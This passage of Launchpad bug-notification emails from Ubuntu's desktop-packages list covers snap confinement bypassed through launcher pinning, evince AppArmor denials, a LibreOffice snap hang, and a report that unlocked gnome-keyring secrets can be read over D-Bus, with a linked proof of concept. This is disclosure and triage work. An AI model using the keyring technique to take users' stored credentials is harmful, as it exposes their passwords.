doesn't match properly In both cases, the initial launch is fine, but pinning the icon to the launcher results in the wrong entry in the Exec= line and launching from this pinned launcher entry after is unconfined. You can check by doing: 1. launch application from the dash 2. run sudo aa-status and see if it is launched under confinement 3. pin the icon that is in the launcher 4. close the application, then launch from the pinned icon 5. run sudo aa-status and see if it is launched under confinement This doesn't happen all the time. For example, vlc seems to work fine both from the command line and from launching via a pinned launcher entry. chrome-test on the other hand doesn't seem to work with either. Related https://github.com/snapcore/snapd/pull/1580 -- puts BAMF_DESKTOP_FILE_HINT in the desktop file instead of in the environment, but Marco requested that this change (https://github.com/snapcore/snapd/pull/1580#issuecomment-234546220). https://trello.com/c/xP1hN3BF/152-improve-desktop-file-support-by- adding-a-new-bamf-desktop-file-hint-environment-hint also discussed this issue, but the card is archived and therefore it won't be worked on. I'm having trouble finding a simple reproducer (other than chrome- test) but am told by Marco that the BAMF matching will always work if BAMF_DESKTOP_FILE_HINT in the process' environment always points to the desktop file in /var/lib/snapd/desktop/applications. I will continue to look for a simple reproducer. To manage notifications about this bug go to: https://bugs.launchpad.net/snappy/+bug/1643910/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1643910] Re: BAMF_DESKTOP_FILE_HINT not set in correct place for unity7
Is there any more progress on this? -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to bamf in Ubuntu. https://bugs.launchpad.net/bugs/1643910 Title: BAMF_DESKTOP_FILE_HINT not set in correct place for unity7 Status in Snappy: Triaged Status in bamf package in Ubuntu: Triaged Bug description: Occasionally when I pin items to the Unity7 launcher, the BAMF code (as I'm told) incorrectly matches to /snap/app/revision/ This is a security issue because the Exec= line points to /snap/app/revision/... which bypasses snap run (/snap/bin/...) and therefore snap-confine. I'm told by Marcus (aka, 3v1n0 aka Trevinho) that this is because BAMF_DESKTOP_FILE_HINT is not exported by snap env and instead only injected in the desktop file that is created in /var/lib/snapd/desktop/applications upon snap install. This means that the wrong Exec= (ie, where it points to the binary) may occur in two places: 1. when launching /snap/bin/... from the command line 2. when something in /var/lib/snapd/desktop/applications/*.desktop doesn't match properly In both cases, the initial launch is fine, but pinning the icon to the launcher results in the wrong entry in the Exec= line and launching from this pinned launcher entry after is unconfined. You can check by doing: 1. launch application from the dash 2. run sudo aa-status and see if it is launched under confinement 3. pin the icon that is in the launcher 4. close the application, then launch from the pinned icon 5. run sudo aa-status and see if it is launched under confinement This doesn't happen all the time. For example, vlc seems to work fine both from the command line and from launching via a pinned launcher entry. chrome-test on the other hand doesn't seem to work with either. Related https://github.com/snapcore/snapd/pull/1580 -- puts BAMF_DESKTOP_FILE_HINT in the desktop file instead of in the environment, but Marco requested that this change (https://github.com/snapcore/snapd/pull/1580#issuecomment-234546220). https://trello.com/c/xP1hN3BF/152-improve-desktop-file-support-by- adding-a-new-bamf-desktop-file-hint-environment-hint also discussed this issue, but the card is archived and therefore it won't be worked on. I'm having trouble finding a simple reproducer (other than chrome- test) but am told by Marco that the BAMF matching will always work if BAMF_DESKTOP_FILE_HINT in the process' environment always points to the desktop file in /var/lib/snapd/desktop/applications. I will continue to look for a simple reproducer. To manage notifications about this bug go to: https://bugs.launchpad.net/snappy/+bug/1643910/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1780365] Re: Credentials located in gnome-keyring can be compromised easily
Thank you for reporting this bug. The access via DBus when the keyring is unlocked is a well-known issue and the design of the feature as explained when reading the entirety of https://wiki.ubuntu.com/SecurityTeam/FAQ#gnome-keyring. Users who prefer to be prompted can choose to use a separate keyring than the one that is automatically unlocked upon successful login. That said, I'm not clear if you are saying that the keyring is not locked during screensaver or logout. If either of these is the case, that sounds like a bug. Can you confirm and detail your methodology? -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to gnome-keyring in Ubuntu. https://bugs.launchpad.net/bugs/1780365 Title: Credentials located in gnome-keyring can be compromised easily Status in gnome-keyring package in Ubuntu: New Bug description: Dear all, I figure out that login credentials, located in gnome-keyring, can be easily compromised. Linux based on Gnome basically uses ‘gnome-keyring’ as their backend to store login credentials in a secure manner. Specifically, google- chrome browser, network-manager and gnome-online-accounts use this as a backend solution to store login credentials. To use this, authentication is performed together with gnome-keyring as part of ‘pam-gnome-keyring.so’. At this point, it remains unlocked until system is shut down or logged out. In this state, a simple program that uses ‘Secret Service API’ call and their ‘D-Bus’ interface can easily retrieve login credentials from those gnome-keyring without any privilege escalation, listening into the X events going to another window, or installation an application on target computer. (please check PoC source https://github.com/sungjungk/keyring_crack and video https://youtu.be/Do4E9ZQaPck) The issue is different from the content shown on the Ubuntu Security FAQ and GnomeKeyring Wiki [1][2]. It was even said that “PAM session is closed via the screensaver, all keyrings are locked, and the ‘login’ keyring is unlocked upon successful authentication to the screensaver”. After trying to crack the keyring, it was far from what they really thought. It is no different than plain text file for login credentials somewhere on disk. To deal with, the root cause of the problem is that ‘Secret Service API’ on anyone can be easily accessed on DBus API. If access control is enabled, only well-known? or authorized processes, such as google- chrome, network-manager, and gnome-online-accounts, will be able to access the login credentials. DBus originally provides capability that is essential to access control of DBus API by defining security policy as a form of *.conf file. Currently, various services based on DBus interface are employing above security policy feature to perform access control. For example, login/system related functions is controlled from ‘login1’ and its security policy is described in “org.freedesktop.login1.conf”. (see https://github.com/systemd/systemd/blob/master/src/core/org.freedesktop.systemd1.conf) Likewise, why don’t we try adopting the access control of secret service API into gnome-keyring environment? Due to the fact that a process with root privilege can access “.conf” file, an approved program may only update the target file during installation process Here is really simple ‘org.freedesktop.secrets.conf’ example. = http://www.freedesktop.org/standards/dbus/1.0/busconfig.dtd";> = Many Thanks!! [1] https://wiki.ubuntu.com/SecurityTeam/FAQ#Contact [2] https://wiki.gnome.org/Projects/GnomeKeyring/SecurityPhilosophy ProblemType: Bug DistroRelease: Ubuntu 18.04 Package: gnome-keyring 3.28.0.2-1ubuntu1 ProcVersionSignature: Ubuntu 4.15.0-20.21-generic 4.15.17 Uname: Linux 4.15.0-20-generic x86_64 ApportVersion: 2.20.9-0ubuntu7.2 Architecture: amd64 CurrentDesktop: ubuntu:GNOME Date: Thu Jul 5 17:45:22 2018 InstallationDate: Installed on 2018-07-06 (0 days ago) InstallationMedia: Ubuntu 18.04 LTS "Bionic Beaver" - Release amd64 (20180426) ProcEnviron: TERM=xterm-256color PATH=(custom, no user) XDG_RUNTIME_DIR= LANG=en_US.UTF-8 SHELL=/bin/bash SourcePackage: gnome-keyring UpgradeStatus: No upgrade log present (probably fresh install) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/gnome-keyring/+bug/1780365/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1802911] Re: [snap] LibreOffice 6.1.3.2 (90) doesn't launch
FYI, '@{PROC}/version r,' is in the default apparmor template. -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to libreoffice in Ubuntu. https://bugs.launchpad.net/bugs/1802911 Title: [snap] LibreOffice 6.1.3.2 (90) doesn't launch Status in libreoffice package in Ubuntu: Invalid Bug description: LibreOffice doesn't launch on 6.1.3.2 (90) in `candidate` on core 16-2.36.1+git1007.f72779e (5920) in `edge`, it just hangs, with no Terminal output, but has the following denials in `journalctl -f`: ``` Nov 12 12:38:19 adam-thinkpad-t430 audit[31984]: AVC apparmor="DENIED" operation="open" profile="snap-update-ns.libreoffice" name="/proc/version" pid=31984 comm="3" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 Nov 12 12:38:19 adam-thinkpad-t430 kernel: audit: type=1400 audit(1542026299.589:542): apparmor="DENIED" operation="open" profile="snap-update-ns.libreoffice" name="/proc/version" pid=31984 comm="3" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 ``` ``` $ snap info libreoffice tracking: candidate refresh-date: 6 days ago, at 08:50 GMT channels: stable:6.1.2.1 (86) 501MB - candidate: 6.1.3.2 (90) 507MB - < beta: ↑ edge: ↑ installed: 6.1.3.2 (90) 507MB - $ snap version snap2.36.1+git1007.f72779e~ubuntu16.04.1 snapd 2.36.1+git1007.f72779e~ubuntu16.04.1 series 16 ubuntu 18.10 kernel 4.18.0-11-generic $ snap info core tracking: edge refresh-date: today at 12:08 GMT channels: stable:16-2.35.5 (5742) 92MB - candidate: 16-2.35.5 (5742) 92MB - beta: 16-2.36.1 (5897) 92MB - edge: 16-2.36.1+git1007.f72779e (5920) 92MB -< installed: 16-2.36.1+git1007.f72779e (5920) 92MB core ``` To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/libreoffice/+bug/1802911/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1798091] Re: thumbnailer cannot create tempfiles (with apparmor denials)
** Also affects: evince (Ubuntu Disco) Importance: High Assignee: Sebastien Bacher (seb128) Status: Fix Released ** Changed in: evince (Ubuntu Disco) Status: Fix Released => Triaged -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to evince in Ubuntu. https://bugs.launchpad.net/bugs/1798091 Title: thumbnailer cannot create tempfiles (with apparmor denials) Status in evince package in Ubuntu: Triaged Status in evince source package in Cosmic: Fix Committed Status in evince source package in Disco: Triaged Status in evince package in Debian: Unknown Bug description: * Impact Nautilus fails to generate previews for pdf files * Test case Download/copy a pdf, open the directory in nautilus, a preview image should be displayed * Regression potential Check that there are no other apparmor denials and the thumbnailer works - While trying to create thumbnails in a directory from within nautilus, I got: [781429.784125] audit: type=1400 audit(1539694722.247:989): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30937 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000 [781429.940592] audit: type=1400 audit(1539694722.403:990): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30941 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000 [781430.314591] audit: type=1400 audit(1539694722.779:991): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30945 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000 [781431.283522] audit: type=1400 audit(1539694723.747:992): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30949 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000 [781431.518566] audit: type=1400 audit(1539694723.983:993): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30953 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000 ProblemType: Bug DistroRelease: Ubuntu 18.10 Package: evince 3.30.1-1 ProcVersionSignature: Ubuntu 4.18.0-8.9-generic 4.18.7 Uname: Linux 4.18.0-8-generic x86_64 ApportVersion: 2.20.10-0ubuntu13 Architecture: amd64 CurrentDesktop: ubuntu:GNOME Date: Tue Oct 16 14:59:00 2018 InstallationDate: Installed on 2014-06-19 (1580 days ago) InstallationMedia: Ubuntu 14.04 LTS "Trusty Tahr" - Release amd64 (20140417) ProcEnviron: TERM=xterm-256color PATH=(custom, no user) XDG_RUNTIME_DIR= LANG=de_DE.UTF-8 SHELL=/bin/bash SourcePackage: evince UpgradeStatus: Upgraded to cosmic on 2018-10-07 (9 days ago) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/evince/+bug/1798091/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1798091] Re: thumbnailer cannot create tempfiles (with apparmor denials)
Uploaded 3.30.1-1ubuntu1.2 to cosmic-proposed. ** Changed in: evince (Ubuntu) Status: In Progress => Fix Committed -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to evince in Ubuntu. https://bugs.launchpad.net/bugs/1798091 Title: thumbnailer cannot create tempfiles (with apparmor denials) Status in evince package in Ubuntu: Fix Committed Status in evince package in Debian: Unknown Bug description: * Impact Nautilus fails to generate previews for pdf files * Test case Download/copy a pdf, open the directory in nautilus, a preview image should be displayed * Regression potential Check that there are no other apparmor denials and the thumbnailer works - While trying to create thumbnails in a directory from within nautilus, I got: [781429.784125] audit: type=1400 audit(1539694722.247:989): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30937 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000 [781429.940592] audit: type=1400 audit(1539694722.403:990): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30941 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000 [781430.314591] audit: type=1400 audit(1539694722.779:991): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30945 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000 [781431.283522] audit: type=1400 audit(1539694723.747:992): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30949 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000 [781431.518566] audit: type=1400 audit(1539694723.983:993): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30953 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000 ProblemType: Bug DistroRelease: Ubuntu 18.10 Package: evince 3.30.1-1 ProcVersionSignature: Ubuntu 4.18.0-8.9-generic 4.18.7 Uname: Linux 4.18.0-8-generic x86_64 ApportVersion: 2.20.10-0ubuntu13 Architecture: amd64 CurrentDesktop: ubuntu:GNOME Date: Tue Oct 16 14:59:00 2018 InstallationDate: Installed on 2014-06-19 (1580 days ago) InstallationMedia: Ubuntu 14.04 LTS "Trusty Tahr" - Release amd64 (20140417) ProcEnviron: TERM=xterm-256color PATH=(custom, no user) XDG_RUNTIME_DIR= LANG=de_DE.UTF-8 SHELL=/bin/bash SourcePackage: evince UpgradeStatus: Upgraded to cosmic on 2018-10-07 (9 days ago) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/evince/+bug/1798091/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1798091] Re: thumbnailer cannot create tempfiles (with apparmor denials)
I'll be updating a new version on top of Seb's changes. Marking back to In Progress for now. ** Changed in: evince (Ubuntu) Status: Fix Committed => In Progress -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to evince in Ubuntu. https://bugs.launchpad.net/bugs/1798091 Title: thumbnailer cannot create tempfiles (with apparmor denials) Status in evince package in Ubuntu: In Progress Status in evince package in Debian: Unknown Bug description: * Impact Nautilus fails to generate previews for pdf files * Test case Download/copy a pdf, open the directory in nautilus, a preview image should be displayed * Regression potential Check that there are no other apparmor denials and the thumbnailer works - While trying to create thumbnails in a directory from within nautilus, I got: [781429.784125] audit: type=1400 audit(1539694722.247:989): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30937 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000 [781429.940592] audit: type=1400 audit(1539694722.403:990): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30941 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000 [781430.314591] audit: type=1400 audit(1539694722.779:991): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30945 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000 [781431.283522] audit: type=1400 audit(1539694723.747:992): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30949 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000 [781431.518566] audit: type=1400 audit(1539694723.983:993): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30953 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000 ProblemType: Bug DistroRelease: Ubuntu 18.10 Package: evince 3.30.1-1 ProcVersionSignature: Ubuntu 4.18.0-8.9-generic 4.18.7 Uname: Linux 4.18.0-8-generic x86_64 ApportVersion: 2.20.10-0ubuntu13 Architecture: amd64 CurrentDesktop: ubuntu:GNOME Date: Tue Oct 16 14:59:00 2018 InstallationDate: Installed on 2014-06-19 (1580 days ago) InstallationMedia: Ubuntu 14.04 LTS "Trusty Tahr" - Release amd64 (20140417) ProcEnviron: TERM=xterm-256color PATH=(custom, no user) XDG_RUNTIME_DIR= LANG=de_DE.UTF-8 SHELL=/bin/bash SourcePackage: evince UpgradeStatus: Upgraded to cosmic on 2018-10-07 (9 days ago) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/evince/+bug/1798091/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1798996] Re: cannot perform readlinkat() on the mount namespace file descriptor of the init process: Permission denied
What is the output of: $ snap version -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to gnome-system-monitor in Ubuntu. https://bugs.launchpad.net/bugs/1798996 Title: cannot perform readlinkat() on the mount namespace file descriptor of the init process: Permission denied Status in gnome-system-monitor package in Ubuntu: Incomplete Bug description: $ gnome-system-monitor cannot perform readlinkat() on the mount namespace file descriptor of the init process: Permission denied And it does not start at all. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/gnome-system-monitor/+bug/1798996/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1798091] Re: thumbnailer cannot create tempfiles (with apparmor denials)
** Bug watch added: Debian Bug tracker #911161 https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=911161 ** Also affects: evince (Debian) via https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=911161 Importance: Unknown Status: Unknown -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to evince in Ubuntu. https://bugs.launchpad.net/bugs/1798091 Title: thumbnailer cannot create tempfiles (with apparmor denials) Status in evince package in Ubuntu: Fix Committed Status in evince package in Debian: Unknown Bug description: While trying to create thumbnails in a directory from within nautilus, I got: [781429.784125] audit: type=1400 audit(1539694722.247:989): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30937 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000 [781429.940592] audit: type=1400 audit(1539694722.403:990): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30941 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000 [781430.314591] audit: type=1400 audit(1539694722.779:991): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30945 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000 [781431.283522] audit: type=1400 audit(1539694723.747:992): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30949 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000 [781431.518566] audit: type=1400 audit(1539694723.983:993): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30953 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000 ProblemType: Bug DistroRelease: Ubuntu 18.10 Package: evince 3.30.1-1 ProcVersionSignature: Ubuntu 4.18.0-8.9-generic 4.18.7 Uname: Linux 4.18.0-8-generic x86_64 ApportVersion: 2.20.10-0ubuntu13 Architecture: amd64 CurrentDesktop: ubuntu:GNOME Date: Tue Oct 16 14:59:00 2018 InstallationDate: Installed on 2014-06-19 (1580 days ago) InstallationMedia: Ubuntu 14.04 LTS "Trusty Tahr" - Release amd64 (20140417) ProcEnviron: TERM=xterm-256color PATH=(custom, no user) XDG_RUNTIME_DIR= LANG=de_DE.UTF-8 SHELL=/bin/bash SourcePackage: evince UpgradeStatus: Upgraded to cosmic on 2018-10-07 (9 days ago) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/evince/+bug/1798091/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1798091] Re: thumbnailer cannot create tempfiles (with apparmor denials)
** Changed in: evince (Ubuntu) Status: In Progress => Fix Committed -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to evince in Ubuntu. https://bugs.launchpad.net/bugs/1798091 Title: thumbnailer cannot create tempfiles (with apparmor denials) Status in evince package in Ubuntu: Fix Committed Bug description: While trying to create thumbnails in a directory from within nautilus, I got: [781429.784125] audit: type=1400 audit(1539694722.247:989): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30937 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000 [781429.940592] audit: type=1400 audit(1539694722.403:990): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30941 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000 [781430.314591] audit: type=1400 audit(1539694722.779:991): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30945 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000 [781431.283522] audit: type=1400 audit(1539694723.747:992): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30949 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000 [781431.518566] audit: type=1400 audit(1539694723.983:993): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30953 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000 ProblemType: Bug DistroRelease: Ubuntu 18.10 Package: evince 3.30.1-1 ProcVersionSignature: Ubuntu 4.18.0-8.9-generic 4.18.7 Uname: Linux 4.18.0-8-generic x86_64 ApportVersion: 2.20.10-0ubuntu13 Architecture: amd64 CurrentDesktop: ubuntu:GNOME Date: Tue Oct 16 14:59:00 2018 InstallationDate: Installed on 2014-06-19 (1580 days ago) InstallationMedia: Ubuntu 14.04 LTS "Trusty Tahr" - Release amd64 (20140417) ProcEnviron: TERM=xterm-256color PATH=(custom, no user) XDG_RUNTIME_DIR= LANG=de_DE.UTF-8 SHELL=/bin/bash SourcePackage: evince UpgradeStatus: Upgraded to cosmic on 2018-10-07 (9 days ago) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/evince/+bug/1798091/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1798091] Re: thumbnailer cannot create tempfiles (with apparmor denials)
Sorry, I said "at the end of the thumbnailer profile". I mean to say: Ralf, you can workaround this by adjusting /etc/apparmor.d/local/usr.bin.evince to have this: owner /tmp/{,.}gnome_desktop_thumbnail.* w, then running: sudo apparmor_parser -r /etc/apparmor.d/usr.bin.evince -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to evince in Ubuntu. https://bugs.launchpad.net/bugs/1798091 Title: thumbnailer cannot create tempfiles (with apparmor denials) Status in evince package in Ubuntu: In Progress Bug description: While trying to create thumbnails in a directory from within nautilus, I got: [781429.784125] audit: type=1400 audit(1539694722.247:989): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30937 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000 [781429.940592] audit: type=1400 audit(1539694722.403:990): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30941 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000 [781430.314591] audit: type=1400 audit(1539694722.779:991): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30945 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000 [781431.283522] audit: type=1400 audit(1539694723.747:992): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30949 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000 [781431.518566] audit: type=1400 audit(1539694723.983:993): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30953 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000 ProblemType: Bug DistroRelease: Ubuntu 18.10 Package: evince 3.30.1-1 ProcVersionSignature: Ubuntu 4.18.0-8.9-generic 4.18.7 Uname: Linux 4.18.0-8-generic x86_64 ApportVersion: 2.20.10-0ubuntu13 Architecture: amd64 CurrentDesktop: ubuntu:GNOME Date: Tue Oct 16 14:59:00 2018 InstallationDate: Installed on 2014-06-19 (1580 days ago) InstallationMedia: Ubuntu 14.04 LTS "Trusty Tahr" - Release amd64 (20140417) ProcEnviron: TERM=xterm-256color PATH=(custom, no user) XDG_RUNTIME_DIR= LANG=de_DE.UTF-8 SHELL=/bin/bash SourcePackage: evince UpgradeStatus: Upgraded to cosmic on 2018-10-07 (9 days ago) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/evince/+bug/1798091/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1798091] Re: thumbnailer cannot create tempfiles (with apparmor denials)
Ralf, you can workaround this by adjust /etc/apparmor.d/local/usr.bin.evince to have this at the end of the evince-thumbnailer profile: owner /tmp/{,.}gnome_desktop_thumbnail.* w, then running: sudo apparmor_parser -r /etc/apparmor.d/usr.bin.evince -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to evince in Ubuntu. https://bugs.launchpad.net/bugs/1798091 Title: thumbnailer cannot create tempfiles (with apparmor denials) Status in evince package in Ubuntu: In Progress Bug description: While trying to create thumbnails in a directory from within nautilus, I got: [781429.784125] audit: type=1400 audit(1539694722.247:989): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30937 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000 [781429.940592] audit: type=1400 audit(1539694722.403:990): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30941 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000 [781430.314591] audit: type=1400 audit(1539694722.779:991): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30945 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000 [781431.283522] audit: type=1400 audit(1539694723.747:992): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30949 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000 [781431.518566] audit: type=1400 audit(1539694723.983:993): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30953 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000 ProblemType: Bug 